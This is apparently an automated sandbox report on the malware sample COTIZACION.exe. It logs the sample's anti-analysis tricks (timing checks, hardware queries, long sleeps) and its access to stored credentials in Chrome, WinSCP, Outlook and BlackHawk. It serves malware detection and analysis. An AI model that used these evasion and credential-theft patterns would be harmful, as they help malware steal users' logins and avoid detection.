            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeFile written: C:\Users\user\Music\antithetic.iniJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: COTIZACION.exeStatic file information: File size 1206384 > 1048576
            Source: COTIZACION.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2000502828.0000000006398000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 0_2_70022351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70022351
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_00150C55 push ebx; retf 5_2_00150C52
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_00150C55 push edi; retf 5_2_00150C7A
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_00156F0F push edx; iretd 5_2_00156F11
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 5_2_3B7176D8 push esp; iretd 5_2_3B7176E9
            Source: C:\Users\user\Desktop\COTIZACION.exeFile created: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\COTIZACION.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\COTIZACION.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\COTIZACION.exeAPI/Special instruction interceptor: Address: 69A4575
            Source: C:\Users\user\Desktop\COTIZACION.exeAPI/Special instruction interceptor: Address: 3664575
            Source: C:\Users\user\Desktop\COTIZACION.exeRDTSC instruction interceptor: First address: 694AE5F second address: 694AE5F instructions: 0x00000000 rdtsc 0x00000002 test ch, ah 0x00000004 test esi, 01E8FF30h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F6AF0D0C9FFh 0x0000000e inc ebp 0x0000000f cmp bx, dx 0x00000012 inc ebx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\COTIZACION.exeRDTSC instruction interceptor: First address: 360AE5F second address: 360AE5F instructions: 0x00000000 rdtsc 0x00000002 test ch, ah 0x00000004 test esi, 01E8FF30h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F6AF0C9A9EFh 0x0000000e inc ebp 0x0000000f cmp bx, dx 0x00000012 inc ebx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\COTIZACION.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeMemory allocated: 382B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeMemory allocated: 38090000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199890Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199781Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199672Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199562Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199453Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199344Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199234Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199125Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199015Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198906Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198797Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198687Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198577Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198469Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198356Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198250Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198140Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198031Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197922Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197812Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197703Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197593Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197484Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197375Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197265Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeWindow / User API: threadDelayed 2473Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeWindow / User API: threadDelayed 7379Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\COTIZACION.exeEvaded block: after key decisiongraph_0-3127
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -27670116110564310s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8096Thread sleep count: 2473 > 30Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -99859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8096Thread sleep count: 7379 > 30Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -99733s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -99609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -99500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -99390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -99280s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -99156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -99047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -98937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -98828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -98717s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -98609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -98500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -98390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -98281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -98167s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -98062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -97953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -97843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -97637s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -97531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -97421s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -97310s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1200000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1199890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1199781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1199672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1199562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1199453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1199344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1199234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1199125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1199015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1198906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1198797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1198687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1198577s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1198469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1198356s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1198250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1198140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1198031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1197922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1197812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1197703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1197593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1197484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1197375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088Thread sleep time: -1197265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\COTIZACION.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\COTIZACION.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\COTIZACION.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\COTIZACION.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 99859Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 99733Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 99609Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 99500Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 99390Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 99280Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 99156Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 99047Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 98937Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 98828Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 98717Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 98609Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 98500Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 98390Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 98281Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 98167Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 98062Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 97953Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 97843Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 97637Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 97531Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 97421Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 97310Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199890Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199781Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199672Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199562Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199453Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199344Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199234Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199125Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1199015Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198906Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198797Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198687Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198577Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198469Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198356Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198250Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198140Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1198031Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197922Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197812Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197703Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197593Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197484Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197375Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeThread delayed: delay time: 1197265Jump to behavior
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007CAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'k:
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
            Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007CAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\COTIZACION.exeAPI call chain: ExitProcess graph end nodegraph_0-3016
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 0_2_70022351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70022351
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeProcess created: C:\Users\user\Desktop\COTIZACION.exe "C:\Users\user\Desktop\COTIZACION.exe"Jump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeQueries volume information: C:\Users\user\Desktop\COTIZACION.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\COTIZACION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: COTIZACION.exe PID: 7796, type: MEMORYSTR
            Source: C:\Users\user\Desktop\COTIZACION.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\COTIZACION.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
